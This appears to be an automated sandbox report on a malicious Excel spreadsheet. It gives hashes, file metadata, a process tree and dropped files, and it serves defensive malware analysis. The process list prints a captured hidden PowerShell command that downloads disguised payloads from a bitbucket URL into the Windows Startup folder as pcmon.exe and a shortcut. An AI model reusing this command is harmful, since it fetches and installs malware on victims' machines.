File name: | 2a28851adbc88c3335c6378c1f02df7f92b6912bbba8515186de194cb284993a |
Full analysis: | https://app.any.run/tasks/bd45e913-5c8d-4a67-81c3-818071996490 |
Verdict: | Malicious activity |
Analysis date: | March 22, 2019, 07:30:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | 6BA7890D1FD39FD3BDE3F5E29DF62AAC |
SHA1: | 6A57118CF2E07AB50D76D3BEAA114E96EC9B7941 |
SHA256: | 2A28851ADBC88C3335C6378C1F02DF7F92B6912BBBA8515186DE194CB284993A |
SSDEEP: | 384:ohtJe3e9nJasT/UlM9z55u0S19SNL3N+lbIEmEDq/iuv9OrDnWa4t:yJbJjxtMDDyLklbIEPeausvWDt |
.xlsx | | | Excel Microsoft Office Open XML Format document (61.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (31.5) |
.zip | | | ZIP compressed archive (7.2) |
AppVersion: | 16.03 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | Sheet1 |
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2019:03:14 16:43:56Z |
CreateDate: | 2018:11:03 15:16:32Z |
LastModifiedBy: | r |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1675 |
ZipCompressedSize: | 431 |
ZipCRC: | 0x6560a6f0 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
916 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
588 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | EXCEL.EXE |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
816 | "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/servicesprint.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\servicesprint.lnk; -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/pcmon.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\pcmon.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR9D6F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C6H8SD38YZYRYXG8QGWY.temp | — | |
MD5:— | SHA256:— | |||
816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5f3d8aaae8f69194.customDestinations-ms | binary | |
MD5:965C12EFBF1820E4B3E1873BB7B0DB28 | SHA256:37B2144041DF8904A5E5D0AA9C7C58EF2FE9CBEDA3AC7334AC6E97E3121DA709 | |||
916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip | compressed | |
MD5:03BCD9FC092ABA4675986BFF5F333310 | SHA256:318806A1E6B9E7A1243598EED36FA610E5ED437244ED6C259C0AFDE3DD23BD4F | |||
916 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A617F2DD.emf | emf | |
MD5:71177D9512C0AD9D0B9B94388028ACC8 | SHA256:B177E0281B98CD231B8E1525B8A7D99B42D24D839B7975877BF635EF94961E93 | |||
588 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa588.43933\UniversalCrypto-scanner.lnk | lnk | |
MD5:6CD8352A312D3F58AE3DB17293825DC9 | SHA256:150B92C113DB1956CB1BA07F9D74B68017FDB4D3FFAE3869A6C8198699FECB7E |